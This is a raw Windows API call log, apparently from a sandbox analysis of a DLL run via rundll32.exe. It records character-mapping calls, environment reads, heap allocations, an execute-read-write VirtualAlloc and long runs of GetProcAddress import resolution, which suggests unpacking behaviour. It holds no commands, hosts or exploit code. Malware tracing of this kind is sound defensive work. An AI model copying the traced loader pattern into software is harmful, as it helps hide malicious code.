!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0205.084] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0xce758, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0205.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0xcf014, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x07ÅVúPó\x0c", lpUsedDefaultChar=0x0) returned 256 [0205.084] RtlInitializeSListHead (in: ListHead=0x1006deb8 | out: ListHead=0x1006deb8) [0205.084] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x800) returned 0x567d28 [0205.085] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0205.086] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a70000 [0205.086] GetProcAddress (hModule=0x75a70000, lpProcName="FlsAlloc") returned 0x75a8a980 [0205.086] GetProcAddress (hModule=0x75a70000, lpProcName="FlsFree") returned 0x75a94ff0 [0205.086] GetProcAddress (hModule=0x75a70000, lpProcName="FlsGetValue") returned 0x75a87570 [0205.086] GetProcAddress (hModule=0x75a70000, lpProcName="FlsSetValue") returned 0x75a89e30 [0205.086] GetProcAddress (hModule=0x75a70000, lpProcName="InitializeCriticalSectionEx") returned 0x75a96740 [0205.086] GetProcAddress (hModule=0x75a70000, lpProcName=0x10008800) returned 0x7530c2d0 [0205.087] GetProcAddress (hModule=0x75a70000, lpProcName="CreateEventExW") returned 0x75a966a0 [0205.087] GetProcAddress (hModule=0x75a70000, lpProcName="CreateSemaphoreW") returned 0x75a96710 [0205.087] GetProcAddress (hModule=0x75a70000, lpProcName="CreateSemaphoreExW") returned 0x75a96700 [0205.087] GetProcAddress (hModule=0x75a70000, lpProcName="CreateThreadpoolTimer") returned 0x75a8ace0 [0205.088] GetProcAddress (hModule=0x75a70000, lpProcName="SetThreadpoolTimer") returned 0x770e7dc0 [0205.088] GetProcAddress (hModule=0x75a70000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x770f4010 [0205.088] GetProcAddress (hModule=0x75a70000, lpProcName="CloseThreadpoolTimer") returned 0x770f2a50 [0205.088] GetProcAddress (hModule=0x75a70000, lpProcName="CreateThreadpoolWait") returned 0x75a8a7b0 [0205.088] GetProcAddress (hModule=0x75a70000, lpProcName="SetThreadpoolWait") returned 0x770f2290 [0205.088] GetProcAddress (hModule=0x75a70000, lpProcName="CloseThreadpoolWait") returned 0x770f2910 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="FlushProcessWriteBuffers") returned 0x77117a60 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7710ac00 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="GetCurrentProcessorNumber") returned 0x770fa890 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="CreateSymbolicLinkW") returned 0x75ab0830 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="GetCurrentPackageId") returned 0x7530ded0 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="GetTickCount64") returned 0x75a83630 [0205.089] GetProcAddress (hModule=0x75a70000, lpProcName="GetFileInformationByHandleEx") returned 0x75ab0ea0 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="SetFileInformationByHandle") returned 0x75a96c30 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x75a96cf0 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="InitializeConditionVariable") returned 0x770c6710 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="WakeConditionVariable") returned 0x7710c720 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="WakeAllConditionVariable") returned 0x77108d70 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="SleepConditionVariableCS") returned 0x75387f60 [0205.090] GetProcAddress (hModule=0x75a70000, lpProcName="InitializeSRWLock") returned 0x770c6710 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="AcquireSRWLockExclusive") returned 0x770ed210 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="TryAcquireSRWLockExclusive") returned 0x770c3650 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="ReleaseSRWLockExclusive") returned 0x770ed080 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="SleepConditionVariableSRW") returned 0x75387fb0 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="CreateThreadpoolWork") returned 0x75a8ea00 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="SubmitThreadpoolWork") returned 0x770ece10 [0205.091] GetProcAddress (hModule=0x75a70000, lpProcName="CloseThreadpoolWork") returned 0x770f0550 [0205.092] GetProcAddress (hModule=0x75a70000, lpProcName="CompareStringEx") returned 0x75a8ff80 [0205.092] GetProcAddress (hModule=0x75a70000, lpProcName="GetLocaleInfoEx") returned 0x75a8a750 [0205.092] GetProcAddress (hModule=0x75a70000, lpProcName="LCMapStringEx") returned 0x75a89a10 [0205.092] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1006df90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0205.092] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x7a) returned 0x55b908 [0205.092] GetEnvironmentStringsW () returned 0x568530* [0205.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1413 [0205.092] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x585) returned 0x569048 [0205.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x569048, cbMultiByte=1413, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1413 [0205.092] FreeEnvironmentStringsW (penv=0x568530) returned 1 [0205.092] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x90) returned 0x55d4f0 [0205.092] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1f) returned 0x55ac40 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x55f9b0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x37) returned 0x562318 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x5603b8 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x561c58 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x55a358 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x5697e0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd) returned 0x55dde0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1d) returned 0x55ac68 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x561c98 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x15) returned 0x55a378 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17) returned 0x568980 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x55ddb0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa2) returned 0x55b410 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x43) returned 0x5665b8 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1b) returned 0x55acb8 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1d) returned 0x55ace0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x566798 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x568a00 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x568b80 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1b) returned 0x569ba0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x5697b0 [0205.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x29) returned 0x55fe48 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x569c68 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa5) returned 0x568d38 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17) returned 0x5689e0 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xf) returned 0x55dd20 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x568ba0 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x55fa90 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x29) returned 0x55fdd8 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x568b20 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x21) returned 0x569810 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x568bc0 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x22) returned 0x569990 [0205.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x568a80 [0205.095] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569048 | out: hHeap=0x550000) returned 1 [0205.095] GetCurrentThread () returned 0xfffffffe [0205.095] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0xcf37c, lpExitTime=0xcf384, lpKernelTime=0xcf384, lpUserTime=0xcf384 | out: lpCreationTime=0xcf37c, lpExitTime=0xcf384, lpKernelTime=0xcf384, lpUserTime=0xcf384) returned 1 [0205.095] RtlInitializeSListHead (in: ListHead=0x1006e738 | out: ListHead=0x1006e738) [0205.095] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x55b740 [0205.096] GetProcessHeap () returned 0x550000 [0205.097] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x560448 [0205.097] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x55e108 [0205.097] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x55fcf8 [0205.098] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x569b00 [0205.098] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x5607a8 [0205.098] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1d4 [0205.099] RtlInitializeConditionVariable (in: ConditionVariable=0x1006ea0c | out: ConditionVariable=0x1006ea0c) [0205.351] VirtualAlloc (lpAddress=0x0, dwSize=0x2772, flAllocationType=0x1000, flProtect=0x40) returned 0x500000 [0205.353] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x100000) returned 0x5f3d020 [0205.368] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x555c48 [0205.368] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x20a00) returned 0x56c1f0 [0205.370] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x555c48) returned 1 [0205.371] GetNativeSystemInfo (in: lpSystemInfo=0xcf820 | out: lpSystemInfo=0xcf820*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0205.371] VirtualAlloc (lpAddress=0x10000000, dwSize=0x24000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0205.372] VirtualAlloc (lpAddress=0x0, dwSize=0x24000, flAllocationType=0x3000, flProtect=0x4) returned 0x510000 [0205.374] LoadLibraryA (lpLibFileName="WindowsCodecs.dll") returned 0x6f2e0000 [0205.399] GetProcAddress (hModule=0x6f2e0000, lpProcName="WICMapSchemaToName") returned 0x6f3300f0 [0205.400] GetProcAddress (hModule=0x6f2e0000, lpProcName="WICMapShortNameToGuid") returned 0x6f3d1720 [0205.401] GetProcAddress (hModule=0x6f2e0000, lpProcName="WICMapGuidToShortName") returned 0x6f3d15f0 [0205.401] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x75cf0000 [0205.401] GetProcAddress (hModule=0x75cf0000, lpProcName="localeconv") returned 0x75d4c100 [0205.401] GetProcAddress (hModule=0x75cf0000, lpProcName="strtod") returned 0x75d21ba0 [0205.401] GetProcAddress (hModule=0x75cf0000, lpProcName="strchr") returned 0x75d78d90 [0205.401] GetProcAddress (hModule=0x75cf0000, lpProcName="strncpy") returned 0x75d79350 [0205.401] GetProcAddress (hModule=0x75cf0000, lpProcName="_time64") returned 0x75d7ea10 [0205.401] GetProcAddress (hModule=0x75cf0000, lpProcName="malloc") returned 0x75d37900 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="free") returned 0x75d37740 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="memset") returned 0x75d78c80 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="memchr") returned 0x75d78380 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="_strtoi64") returned 0x75d21e60 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="_errno") returned 0x75d25cd0 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="_snprintf") returned 0x75d65020 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="_ftol2_sse") returned 0x75d8a580 [0205.402] GetProcAddress (hModule=0x75cf0000, lpProcName="_vsnwprintf") returned 0x75d66840 [0205.403] GetProcAddress (hModule=0x75cf0000, lpProcName="memcpy") returned 0x75d784a0 [0205.403] GetProcAddress (hModule=0x75cf0000, lpProcName="atol") returned 0x75d1fe40 [0205.403] GetProcAddress (hModule=0x75cf0000, lpProcName="qsort") returned 0x75d4c200 [0205.403] GetProcAddress (hModule=0x75cf0000, lpProcName="_vsnprintf") returned 0x75d663d0 [0205.403] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75a70000 [0205.403] GetProcAddress (hModule=0x75a70000, lpProcName="SwitchToThread") returned 0x75a8a690 [0205.403] GetProcAddress (hModule=0x75a70000, lpProcName="GetModuleHandleW") returned 0x75a89bc0 [0205.403] GetProcAddress (hModule=0x75a70000, lpProcName="GetProcAddress") returned 0x75a878b0 [0205.403] GetProcAddress (hModule=0x75a70000, lpProcName="HeapCreate") returned 0x75a8a100 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="HeapFree") returned 0x75a81ba0 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="HeapAlloc") returned 0x770d2bd0 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="GetModuleHandleA") returned 0x75a899f0 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="LoadLibraryA") returned 0x75a94bf0 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="GetNumberFormatA") returned 0x75ac6060 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcatW") returned 0x75aad170 [0205.404] GetProcAddress (hModule=0x75a70000, lpProcName="WideCharToMultiByte") returned 0x75a83880 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="lstrlenW") returned 0x75a83690 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="LoadLibraryW") returned 0x75a8a840 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="FreeLibrary") returned 0x75a89f50 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="GetCommandLineW") returned 0x75a8aba0 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="GetVersionExA") returned 0x75a8a700 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="GetSystemInfo") returned 0x75a8a0f0 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="GetCurrentDirectoryW") returned 0x75a8a9a0 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="GetWindowsDirectoryW") returned 0x75a95120 [0205.405] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcmpiA") returned 0x75a87830 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="GetSystemTimeAsFileTime") returned 0x75a87620 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="GetExitCodeProcess") returned 0x75a8fdb0 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="FindFirstFileW") returned 0x75a96960 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="FindNextFileW") returned 0x75a969a0 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="SetFileAttributesW") returned 0x75a96c20 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="LocalAlloc") returned 0x75a87a30 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcpynA") returned 0x75a8fe40 [0205.406] GetProcAddress (hModule=0x75a70000, lpProcName="FlushFileBuffers") returned 0x75a969b0 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="SetThreadPriority") returned 0x75a89990 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="GetTickCount") returned 0x75a95eb0 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="ExitThread") returned 0x77107a80 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="MoveFileW") returned 0x75a8b1d0 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="K32GetModuleFileNameExW") returned 0x75ab16a0 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcmpA") returned 0x75a8cc30 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="DisconnectNamedPipe") returned 0x75ab0990 [0205.407] GetProcAddress (hModule=0x75a70000, lpProcName="GetProcessId") returned 0x75a8a6a0 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="GetCurrentThread") returned 0x75a875f0 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="CreateMutexW") returned 0x75a966f0 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcatA") returned 0x75a8f640 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="CreateDirectoryW") returned 0x75a96860 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="GetLastError") returned 0x75a83870 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcpynW") returned 0x75a90090 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="GetDriveTypeW") returned 0x75a96a10 [0205.408] GetProcAddress (hModule=0x75a70000, lpProcName="lstrcmpiW") returned 0x75a87590 [0205.409] GetProcAddress (hModule=0x75a70000, lpProcName="Sleep") returned 0x75a87990 [0205.409] GetProcAddress (hModule=0x75a70000, lpProcName="SetCurrentDirectoryA") returned 0x75ab2290 [0205.409] GetProcAddress (hModule=0x75a70000, lpProcName="GetFileAttributesW") returned 0x75a96a50 [0205.409] GetProcAddress (hModule=0x75a70000, lpProcName="GetCurrentProcessId") returned 0x75a823e0 [0205.409] GetProcAddress (hModule=0x75a70000, lpProcName="MultiByteToWideChar") returned 0x75a82ad0 [0205.409] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x753d0000 [0205.409] GetProcAddress (hModule=0x753d0000, lpProcName="RegisterClassExA") returned 0x75404e90 [0205.409] GetProcAddress (hModule=0x753d0000, lpProcName="UnregisterClassA") returned 0x754062b0 [0205.410] GetProcAddress (hModule=0x753d0000, lpProcName="CreateWindowExA") returned 0x75406f30 [0205.410] GetProcAddress (hModule=0x753d0000, lpProcName="DestroyWindow") returned 0x754092b0 [0205.410] GetProcAddress (hModule=0x753d0000, lpProcName="CharUpperBuffW") returned 0x75404d90 [0205.410] GetProcAddress (hModule=0x753d0000, lpProcName="CharUpperBuffA") returned 0x7545aba0 [0205.410] GetProcAddress (hModule=0x753d0000, lpProcName="DefWindowProcW") returned 0x7712aee0 [0205.410] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75db0000 [0205.410] GetProcAddress (hModule=0x75db0000, lpProcName="CreateFontA") returned 0x75e64d20 [0205.410] GetProcAddress (hModule=0x75db0000, lpProcName="GdiTransparentBlt") returned 0x75e63320 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateHalftonePalette") returned 0x75e67990 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateFontIndirectExW") returned 0x75e66550 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateEnhMetaFileA") returned 0x75e58dd0 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateScalableFontResourceA") returned 0x75e8b100 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreatePenIndirect") returned 0x75e61200 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateSolidBrush") returned 0x75e32f50 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateEllipticRgn") returned 0x75e95b10 [0205.411] GetProcAddress (hModule=0x75db0000, lpProcName="CreateDIBPatternBrush") returned 0x75e65610 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateScalableFontResourceW") returned 0x75e8b6b0 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateDIBPatternBrushPt") returned 0x75e95ad0 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateRoundRectRgn") returned 0x75e63ec0 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateRectRgnIndirect") returned 0x75e60ab0 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateEllipticRgnIndirect") returned 0x75e95b20 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateHatchBrush") returned 0x75e95bd0 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateBrushIndirect") returned 0x75e54d30 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="CreateBitmapIndirect") returned 0x75e65290 [0205.412] GetProcAddress (hModule=0x75db0000, lpProcName="GdiGetBatchLimit") returned 0x75e96a70 [0205.413] GetProcAddress (hModule=0x75db0000, lpProcName="CreateDIBSection") returned 0x75e5ef00 [0205.413] GetProcAddress (hModule=0x75db0000, lpProcName="CreatePatternBrush") returned 0x75e66700 [0205.413] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75820000 [0205.413] GetProcAddress (hModule=0x75820000, lpProcName="CreatePrivateObjectSecurity") returned 0x758429e0 [0205.413] GetProcAddress (hModule=0x75820000, lpProcName="GetEventLogInformation") returned 0x75842f00 [0205.413] GetProcAddress (hModule=0x75820000, lpProcName="AddAccessDeniedAce") returned 0x758561b0 